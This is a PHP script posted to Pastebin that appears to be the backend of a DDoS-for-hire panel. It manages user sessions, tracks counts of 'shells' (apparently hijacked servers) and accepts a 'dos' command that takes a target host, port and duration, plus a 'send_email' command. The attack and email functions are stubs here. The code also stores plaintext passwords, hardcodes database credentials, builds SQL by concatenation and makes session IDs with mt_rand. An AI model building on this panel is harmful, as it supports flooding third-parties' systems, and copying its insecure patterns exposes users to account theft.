SHARE
TWEET

Untitled

a guest Jun 4th, 2017 102 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2.  
  3. //configuration
  4. class Config {
  5.     public static $mysql_user = "ilia";
  6.     public static $mysql_pass = "horilka";
  7.     public static $mysql_server = "localhost";
  8.     public static $mysql_database = "ilia";
  9.     public static $mysql_table_prefix = "p_";
  10.     public static $debug = true;
  11. }
  12.  
  13. //error response codes
  14. class ErrorCode {
  15.    
  16.     /*
  17.     public static $MISSING_PARAMETERS = 1;
  18.     public static $AUTHENTICATION_FAILED = 2;
  19.     public static $USER_NOT_FOUND = 3;
  20.     public static $LOGIN_FAILED = 4;
  21.     public static $ACCESS_DENIED = 5;
  22.     public static $INVALID_COMMAND = 6;
  23.     */
  24.    
  25.     public static $MISSING_PARAMETERS = "missing params";
  26.     public static $AUTHENTICATION_FAILED = "authentication failed";
  27.     public static $USER_NOT_FOUND = "user not found";
  28.     public static $LOGIN_FAILED = "login failed";
  29.     public static $ACCESS_DENIED = "access denied";
  30.     public static $INVALID_COMMAND = "invalid command";
  31.     public static $MYSQL_ERROR = "mysql error";
  32.     public static $MYSQL_ILLEGAL_QUERY = "fuck off";
  33.    
  34. }
  35.  
  36. class ServletInterface {
  37.     public static function dos($host, $port, $shells, $time) {
  38.         echo "dossing now!";
  39.     }
  40.    
  41.     public static function email($to, $from, $email, $subject, $message) {
  42.         echo "sending email!";
  43.     }
  44. }
  45.  
  46. class Session {
  47.    
  48.     //stores all the user info
  49.     private $user = array();
  50.    
  51.     //user info is loaded in the constructor
  52.     public function __construct() {
  53.         //make sure the user parameter is set
  54.         Util::isset_m('user');
  55.        
  56.         $this->user = Mysql::getUserRow($_GET['user']);
  57.         //make sure user exists
  58.         if($this->user == null) {
  59.             Util::error(ErrorCode::$USER_NOT_FOUND);
  60.         }
  61.     }
  62.    
  63.     //login function
  64.     public function login() {
  65.        
  66.         //make sure the pass is set
  67.         Util::isset_m('pass');
  68.        
  69.         if($this->user['pass'] == $_GET['pass']) {
  70.             //update the database
  71.             $this->user['id'] = Util::random_str(20);
  72.             $this->user['ip'] = $_SERVER['REMOTE_ADDR'];
  73.             $this->user['time'] = time();
  74.             Mysql::setSession($this->user['name'], $this->user['id'], $this->user['time'], $this->user['ip']);
  75.             //echo out all the info
  76.             Util::report_info($this->user);
  77.         }else {
  78.             Util::error(ErrorCode::$LOGIN_FAILED);
  79.         }
  80.     }
  81.    
  82.     //clear the session id
  83.     public function logout() {
  84.         Mysql::clearSession($this->user['name']);
  85.     }
  86.    
  87.     //output account info
  88.     public function getAccountInfo() {
  89.         Util::report_info($this->user);
  90.     }
  91.    
  92.     //check if the session id is correct
  93.     public function checkId() {
  94.         Util::isset_m('session_id');
  95.         if($this->user['id'] != $_GET['session_id']) {
  96.             Util::error(ErrorCode::$AUTHENTICATION_FAILED);
  97.         }
  98.     }
  99.    
  100.     //make sure the user is admin
  101.     public function checkAdmin() {
  102.         if($this->user['type'] != "admin") {
  103.             Util::error(ErrorCode::$ACCESS_DENIED);
  104.         }
  105.     }
  106.    
  107.     //lock the account
  108.     public function lockAccount() {
  109.         Mysql::setStatus($this->user['name'], "locked");
  110.     }
  111.    
  112.     //unlock the account
  113.     public function unlockAccount() {
  114.         Mysql::setStatus($this->user['name'], "active");
  115.     }
  116. }
  117.  
  118. class Mysql {
  119.     private static $con = null;
  120.     // Connect to the mysql database.
  121.     public static function connect() {
  122.         self::$con = @mysql_connect(Config::$mysql_server, Config::$mysql_user, Config::$mysql_pass);
  123.         if(!self::$con) {
  124.             Util::error(ErrorCode::$MYSQL_ERROR);
  125.         }
  126.         mysql_select_db(Config::$mysql_database, self::$con);
  127.     }
  128.    
  129.     // Disconnect from the mysql database.
  130.     public static function disconnect() {
  131.         if(self::$con) {
  132.             mysql_close(self::$con);
  133.         }
  134.     }
  135.    
  136.     //sqli prevention check
  137.     private static function sqli_check(/*... */) {
  138.        
  139.         $sqli_illegal = Array("select", "drop", "insert", "update", "create", "grant", "revoke");
  140.         $unsafe_args = func_get_args();
  141.        
  142.         foreach($unsafe_args as $unsafe) {
  143.             if($unsafe != mysql_real_escape_string($unsafe)) {
  144.                 Util::error(ErrorCode::$MYSQL_ILLEGAL_QUERY);
  145.             }
  146.             foreach($sqli_illegal as $x) {
  147.                 if(strpos(strtolower($unsafe), $x) !== false) {
  148.                     Util::error(ErrorCode::$MYSQL_ILLEGAL_QUERY);
  149.                 }
  150.             }
  151.         }
  152.     }
  153.    
  154.     // Create a user into the mysql user table.
  155.     public static function createUser($user, $pass, $account_type, $extra_info) {
  156.         self::sqli_check($user, $pass, $account_type, $extra_info);
  157.         $time = time();
  158.         $query = "INSERT INTO " . Config::$mysql_table_prefix . "clients (user, pass, session_id, session_timeout, session_ip, account_status, active_shells, account_type, extra_info) VALUES ('$user', '$pass', '0', '$time' , '0', 'active', '0', '$account_type', '$extra_info');";
  159.         mysql_query($query);
  160.     }
  161.    
  162.     //set the session information
  163.     public static function setSession($user, $session_id, $session_time, $session_ip) {
  164.         self::sqli_check($user, $session_id, $session_time, $session_ip);
  165.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '$session_id',  session_ip = '$session_ip', session_timeout = '$session_time' WHERE user = '$user'";
  166.         mysql_query($query);
  167.     }
  168.    
  169.     //clear the session information
  170.     public static function clearSession($user) {
  171.         self::sqli_check($user);
  172.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET session_id = '0', session_timeout = '0' WHERE user = '$user'";
  173.         mysql_query($query);
  174.     }
  175.    
  176.    
  177.     //get the user's info and return it as an array
  178.     public static function getUserRow($user) {
  179.         self::sqli_check($user);
  180.         $query = "SELECT * FROM " . Config::$mysql_table_prefix . "clients WHERE user = '$user' LIMIT 1;";
  181.         $result = mysql_query($query);
  182.         if(!$result) {
  183.             Util::error(ErrorCode::$MYSQL_ERROR);
  184.         }
  185.         $user = array();
  186.         if(mysql_num_rows($result) == 1) {
  187.             $resultArray = mysql_fetch_array($result);
  188.             $user['name'] = $resultArray['user'];
  189.             $user['ip'] = $resultArray['session_ip'];
  190.             $user['id'] = $resultArray['session_id'];
  191.             $user['time'] = $resultArray['session_timeout'];
  192.             $user['status'] = $resultArray['account_status'];
  193.             $user['shells'] = $resultArray['active_shells'];
  194.             $user['type'] = $resultArray['account_type'];
  195.             $user['pass'] = $resultArray['pass'];
  196.             $user['info'] = $resultArray['extra_info'];
  197.         }else {
  198.             $user = null;
  199.         }
  200.         return $user;
  201.     }
  202.    
  203.     //return the number of shells
  204.     public static function getShellCount() {
  205.         $query = "SELECT COUNT(*) FROM " . Config::$mysql_table_prefix . "shells";
  206.         $result = mysql_query($query);
  207.         if(!$result) {
  208.             Util::error(ErrorCode::$MYSQL_ERROR);
  209.         }
  210.         $rows =  mysql_fetch_row($result);
  211.         return $rows[0];
  212.     }
  213.    
  214.     //set the user account status
  215.     public static function setStatus($u, $status) {
  216.         $query = "UPDATE " . Config::$mysql_table_prefix . "clients SET account_status = '$status' WHERE user = '$u' LIMIT 1;";
  217.         mysql_query($query);
  218.     }
  219. }
  220.  
  221. class Util {
  222.    
  223.     //make the xml html friendly
  224.     public static function formatXML($xml) {
  225.         $xml = str_replace("<", "<", $xml);
  226.         $xml = str_replace(">", ">", $xml);
  227.         $xml = str_replace("\n", "<br />\n", $xml);
  228.         return $xml;
  229.     }
  230.    
  231.     //make sure parameters are set
  232.     public static function isset_m(/*...*/) {
  233.         $params = func_get_args();
  234.         foreach($params as $param) {
  235.             if(!isset($_GET[$param])) {
  236.                 self::error(ErrorCode::$MISSING_PARAMETERS);
  237.             }
  238.         }
  239.     }
  240.    
  241.     //create a random string
  242.     public static function random_str($length) {
  243.         $characters = "0123456789abcdefghijklmnopqrstuvwxyz";
  244.         $len = strlen($characters);
  245.         $rand = "";
  246.         for ($i = 0; $i < $length; $i++) {
  247.             $rand .= $characters[mt_rand(0, $len - 1)];
  248.         }
  249.         return $rand;
  250.     }
  251.    
  252.     //report error
  253.     public static function error($msg) {
  254.         if(Config::$debug) {
  255.             echo Util::formatXML("<error> $msg </error>");
  256.         }else {
  257.             echo "<error> $msg </error>";
  258.         }
  259.        
  260.         Mysql::disconnect();
  261.         exit(0);
  262.     }
  263.    
  264.     //report success
  265.     public static function success($msg) {
  266.         if(Config::$debug) {
  267.             echo Util::formatXML("<success> $msg </success>");
  268.         }else {
  269.             echo "<success> $msg </success>";
  270.         }
  271.         Mysql::disconnect();
  272.         exit(0);
  273.     }
  274.    
  275.     //display account info as xml
  276.     public static function report_info($user) {
  277.         $total_shells = Mysql::getShellCount();
  278.         $info = "<account>\n";
  279.         $info .= "  <session_id>" . $user['id'] . "</session_id>\n";
  280.         $info .= "  <total_shells>" . $total_shells . "</total_shells>\n";
  281.         $info .= "  <active_shells>" . $user['shells'] . "</active_shells>\n";
  282.         $info .= "  <account_status>" .$user['status'] . "</account_status>\n";
  283.         $info .= "  <account_type>" . $user['type'] . "</account_type>\n";
  284.         $info .= "</account>";
  285.         if(Config::$debug) {
  286.             $info = Util::formatXML($info);
  287.         }
  288.         echo $info;
  289.        
  290.         Mysql::disconnect();
  291.         exit(0);
  292.     }
  293.    
  294.     //display errors
  295.     public static function show_errors() {
  296.         error_reporting(E_ALL);
  297.         ini_set('display_errors', '1');
  298.     }
  299.    
  300.     //hide errors
  301.     public static function hide_errors() {
  302.         error_reporting(E_COMPILE_ERROR);
  303.         ini_set('display_errors', '0');
  304.     }
  305. }
  306.  
  307. //display all php errors
  308. Util::show_errors();
  309.  
  310. //connect to mysql
  311. Mysql::connect();
  312.  
  313. //create the user session
  314. $session = new Session();
  315.  
  316. //make sure there is a command
  317. Util::isset_m('cmd');
  318.  
  319. //authenticate
  320. if($_GET['cmd'] == "login") {
  321.     $session->login();
  322. }else {
  323.     $session->checkId();
  324. }
  325.  
  326. //parse the commands
  327. switch ($_GET['cmd']) {
  328.     case "logout":
  329.         $session->logout();
  330.         Util::success("Logout Successful");
  331.         break;
  332.     case "dos":
  333.         Util::isset_m('host','port','time','shells');
  334.         ServletInterface::dos($_GET['host'], $_GET['port'], $_GET['shells'], $_GET['time']);
  335.         break;
  336.     case "unlock_account":
  337.         $session->checkAdmin();
  338.         $session->unlockAccount();
  339.         Util::success("Account Unlocked");
  340.         break;
  341.     case "lock_account":
  342.         $session->checkAdmin();
  343.         $session->lockAccount();
  344.         Util::success("Account Locked");
  345.         break;
  346.     case "create_user":
  347.         $session->checkAdmin();
  348.         Util::isset_m('n_user','n_pass','n_type','n_info');
  349.         Mysql::createUser($_GET['n_user'], $_GET['n_pass'], $_GET['n_type'], $_GET['n_info']);
  350.         Util::success("User Created");
  351.         break;
  352.     case "send_email":
  353.         Util::isset_m('to','from','email','subject','message');
  354.         ServletInterface::email($_GET['to'], $_GET['from'], $_GET['email'], $_GET['subject'], $_GET['message']);
  355.     case "account_info":
  356.         $session->getAccountInfo();
  357.     default:
  358.         Util::error(ErrorCode::$INVALID_COMMAND);
  359.         break;
  360. }
  361.  
  362. Mysql::disconnect();
  363.  
  364. ?>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top